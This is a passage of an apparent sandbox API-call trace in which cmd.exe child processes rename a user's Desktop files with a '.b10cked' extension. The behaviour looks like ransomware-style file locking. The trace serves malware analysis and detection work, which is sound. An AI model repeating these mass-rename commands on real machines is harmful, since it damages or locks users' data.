(lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.892] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef42c | out: lpFindFileData=0x2ef42c) returned 0x3dfff8 [0220.892] FindClose (in: hFindFile=0x3dfff8 | out: hFindFile=0x3dfff8) returned 1 [0220.892] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef42c | out: lpFindFileData=0x2ef42c) returned 0x3dfff8 [0220.892] FindClose (in: hFindFile=0x3dfff8 | out: hFindFile=0x3dfff8) returned 1 [0220.893] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef42c | out: lpFindFileData=0x2ef42c) returned 0x3dfff8 [0220.893] FindClose (in: hFindFile=0x3dfff8 | out: hFindFile=0x3dfff8) returned 1 [0220.893] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.893] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0220.893] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0220.893] GetEnvironmentStringsW () returned 0x3e2ad8* [0220.893] FreeEnvironmentStringsW (penv=0x3e2ad8) returned 1 [0220.893] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.894] GetConsoleOutputCP () returned 0x1b5 [0220.894] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.894] GetUserDefaultLCID () returned 0x409 [0220.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a1e4950, cchData=8 | out: lpLCData=":") returned 2 [0220.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef7f0, cchData=128 | out: lpLCData="0") returned 2 [0220.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef7f0, cchData=128 | out: lpLCData="0") returned 2 [0220.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef7f0, cchData=128 | out: lpLCData="1") returned 2 [0220.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a1e4940, cchData=8 | out: lpLCData="/") returned 2 [0220.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a1e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0220.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a1e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0220.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a1e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0220.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a1e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0220.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a1e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0220.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a1e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0220.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a1e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0220.895] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a1e4930, cchData=8 | out: lpLCData=".") returned 2 [0220.896] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a1e4920, cchData=8 | out: lpLCData=",") returned 2 [0220.896] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0220.897] GetConsoleTitleW (in: lpConsoleTitle=0x3d08d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.897] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.897] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0220.897] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0220.897] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0220.898] _wcsicmp (_String1="move", _String2=")") returned 68 [0220.899] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0220.899] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0220.899] _wcsicmp (_String1="IF", _String2="move") returned -4 [0220.899] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0220.899] _wcsicmp (_String1="REM", _String2="move") returned 5 [0220.899] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0220.902] GetConsoleTitleW (in: lpConsoleTitle=0x2ef4e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0222.984] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0222.984] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0222.984] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0222.984] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0222.984] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0222.984] _wcsicmp (_String1="move", _String2="CD") returned 10 [0222.984] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0222.984] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0222.984] _wcsicmp (_String1="move", _String2="REN") returned -5 [0222.984] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0222.984] _wcsicmp (_String1="move", _String2="SET") returned -6 [0222.984] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0222.984] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0222.984] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0222.984] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0222.984] _wcsicmp (_String1="move", _String2="MD") returned 11 [0222.984] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0222.984] _wcsicmp (_String1="move", _String2="RD") returned -5 [0222.984] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0222.984] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0222.984] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0222.984] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0222.984] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0222.984] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0222.984] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0222.984] _wcsicmp (_String1="move", _String2="VER") returned -9 [0222.984] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0222.984] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0222.984] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0222.984] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0222.984] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0222.985] _wcsicmp (_String1="move", _String2="START") returned -6 [0222.985] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0222.985] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0222.985] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0222.986] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0222.986] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0222.986] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2ef2a4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2ef29c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2ef29c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0222.987] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0222.988] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0222.988] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0222.988] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0222.988] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0222.988] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0222.988] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0222.988] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0222.988] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0222.988] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0222.988] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0222.988] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0222.988] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0222.988] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0222.988] _wcsicmp (_String1="CKLVAY~1.FLV", _String2=".") returned 53 [0222.988] _wcsicmp (_String1="CKLVAY~1.FLV", _String2="..") returned 53 [0222.988] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CKLVAY~1.FLV" (normalized: "c:\\users\\eebsym5\\desktop\\cklvay~1.flv")) returned 0x20 [0222.989] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3e1d40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0222.989] SetErrorMode (uMode=0x0) returned 0x0 [0222.989] SetErrorMode (uMode=0x1) returned 0x0 [0222.989] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CKLVAY~1.FLV", nBufferLength=0x104, lpBuffer=0x2eec2c, lpFilePart=0x2eec14 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\CKLVAY~1.FLV", lpFilePart=0x2eec14*="CKLVAY~1.FLV") returned 0x25 [0222.989] SetErrorMode (uMode=0x0) returned 0x1 [0222.989] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0222.989] _wcsicmp (_String1="CKLVAY~1.FLV", _String2=".") returned 53 [0222.989] _wcsicmp (_String1="CKLVAY~1.FLV", _String2="..") returned 53 [0222.989] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CKLVAY~1.FLV" (normalized: "c:\\users\\eebsym5\\desktop\\cklvay~1.flv")) returned 0x20 [0222.989] SetErrorMode (uMode=0x0) returned 0x0 [0222.989] SetErrorMode (uMode=0x1) returned 0x0 [0222.989] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CKLVAY~1.FLV", nBufferLength=0x104, lpBuffer=0x2ef0a8, lpFilePart=0x2eee40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\CKLVAY~1.FLV", lpFilePart=0x2eee40*="CKLVAY~1.FLV") returned 0x25 [0222.989] SetErrorMode (uMode=0x0) returned 0x1 [0222.990] SetErrorMode (uMode=0x0) returned 0x0 [0222.990] SetErrorMode (uMode=0x1) returned 0x0 [0222.990] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CKLvAyoW1loaz.flv.b10cked", nBufferLength=0x104, lpBuffer=0x2ef2b0, lpFilePart=0x2eee40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\CKLvAyoW1loaz.flv.b10cked", lpFilePart=0x2eee40*="CKLvAyoW1loaz.flv.b10cked") returned 0x32 [0222.990] SetErrorMode (uMode=0x0) returned 0x1 [0222.990] SetLastError (dwErrCode=0x0) [0222.990] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CKLvAyoW1loaz.flv.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\cklvayow1loaz.flv.b10cked")) returned 0xffffffff [0222.990] GetLastError () returned 0x2 [0222.990] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CKLVAY~1.FLV", fInfoLevelId=0x1, lpFindFileData=0x2ee7bc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ee7bc) returned 0x3d0f08 [0222.990] FindNextFileW (in: hFindFile=0x3d0f08, lpFindFileData=0x2ee7bc | out: lpFindFileData=0x2ee7bc) returned 0 [0222.991] GetLastError () returned 0x12 [0222.991] FindClose (in: hFindFile=0x3d0f08 | out: hFindFile=0x3d0f08) returned 1 [0222.992] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CKLVAY~1.FLV", fInfoLevelId=0x1, lpFindFileData=0x3e1ae0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3e1ae0) returned 0x3d0f08 [0222.992] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CKLvAyoW1loaz.flv.b10cked", nBufferLength=0x104, lpBuffer=0x2eea54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\CKLvAyoW1loaz.flv.b10cked", lpFilePart=0x0) returned 0x32 [0222.992] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CKLvAyoW1loaz.flv", nBufferLength=0x104, lpBuffer=0x2eea54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\CKLvAyoW1loaz.flv", lpFilePart=0x0) returned 0x2a [0222.992] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CKLvAyoW1loaz.flv" (normalized: "c:\\users\\eebsym5\\desktop\\cklvayow1loaz.flv")) returned 0x20 [0222.992] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\CKLvAyoW1loaz.flv" (normalized: "c:\\users\\eebsym5\\desktop\\cklvayow1loaz.flv"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\CKLvAyoW1loaz.flv.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\cklvayow1loaz.flv.b10cked"), dwFlags=0x3) returned 1 [0222.993] FindClose (in: hFindFile=0x3d0f08 | out: hFindFile=0x3d0f08) returned 1 [0222.993] _vsnwprintf (in: _Buffer=0x4a1e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2eea08 | out: _Buffer=" 1") returned 9 [0222.993] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.993] GetFileType (hFile=0x7) returned 0x2 [0222.993] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0222.993] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ee994 | out: lpMode=0x2ee994) returned 1 [0222.993] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.993] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ee9c8 | out: lpConsoleScreenBufferInfo=0x2ee9c8) returned 1 [0222.994] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0222.994] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x2eea08 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0222.994] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a1f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2ee9ec, lpReserved=0x0 | out: lpBuffer=0x4a1f4640*, lpNumberOfCharsWritten=0x2ee9ec*=0x1a) returned 1 [0222.995] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.995] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0222.995] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.995] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0222.995] _get_osfhandle (_FileHandle=0) returned 0x3 [0222.995] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0222.995] SetConsoleInputExeNameW () returned 0x1 [0222.995] GetConsoleOutputCP () returned 0x1b5 [0222.995] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0222.995] SetThreadUILanguage (LangId=0x0) returned 0x409 [0222.995] exit (_Code=0) Process: id = "577" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16640" os_pid = "0xf44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\DCFT2D~1.OTS\" \"C:\\Users\\EEBsYm5\\Desktop\\dcFt2Dy7M6d8J9.ots.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32934 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32935 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32936 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32937 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 32938 start_va = 0x4a1c0000 end_va = 0x4a20bfff entry_point = 0x4a1c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32939 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32940 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32941 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32942 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 32943 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33152 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33153 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33154 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33155 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 33156 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 33157 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33158 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33159 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33160 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33161 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33162 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33163 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33164 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33165 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33166 start_va = 0x410000 end_va = 0x4d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 33167 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33168 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33169 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 33170 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 33171 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 33172 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 33173 start_va = 0x4e0000 end_va = 0x5e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 33174 start_va = 0x5f0000 end_va = 0x11effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 33175 start_va = 0x11f0000 end_va = 0x1352fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011f0000" filename = "" Thread: id = 781 os_tid = 0xc98 [0220.713] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24f81c | out: lpSystemTimeAsFileTime=0x24f81c*(dwLowDateTime=0xb85abcc0, dwHighDateTime=0x1d440a9)) [0220.713] GetCurrentProcessId () returned 0xf44 [0220.713] GetCurrentThreadId () returned 0xc98 [0220.713] GetTickCount () returned 0x3d96d [0220.713] QueryPerformanceCounter (in: lpPerformanceCount=0x24f814 | out: lpPerformanceCount=0x24f814*=27750212348) returned 1 [0220.713] GetModuleHandleA (lpModuleName=0x0) returned 0x4a1c0000 [0220.713] __set_app_type (_Type=0x1) [0220.713] __p__fmode () returned 0x76b331f4 [0220.714] __p__commode () returned 0x76b331fc [0220.714] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1e21a6) returned 0x0 [0220.714] __getmainargs (in: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c, _DoWildCard=0, _StartInfo=0x4a1e4140 | out: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c) returned 0 [0220.714] GetCurrentThreadId () returned 0xc98 [0220.714] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc98) returned 0x38 [0220.714] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.714] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0220.714] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.714] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0220.714] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24f7ac | out: phkResult=0x24f7ac*=0x0) returned 0x2 [0220.714] VirtualQuery (in: lpAddress=0x24f7e3, lpBuffer=0x24f77c, dwLength=0x1c | out: lpBuffer=0x24f77c*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.714] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24f77c, dwLength=0x1c | out: lpBuffer=0x24f77c*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0220.714] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24f77c, dwLength=0x1c | out: lpBuffer=0x24f77c*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0220.714] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24f77c, dwLength=0x1c | out: lpBuffer=0x24f77c*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.714] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24f77c, dwLength=0x1c | out: lpBuffer=0x24f77c*(BaseAddress=0x250000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xc0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c 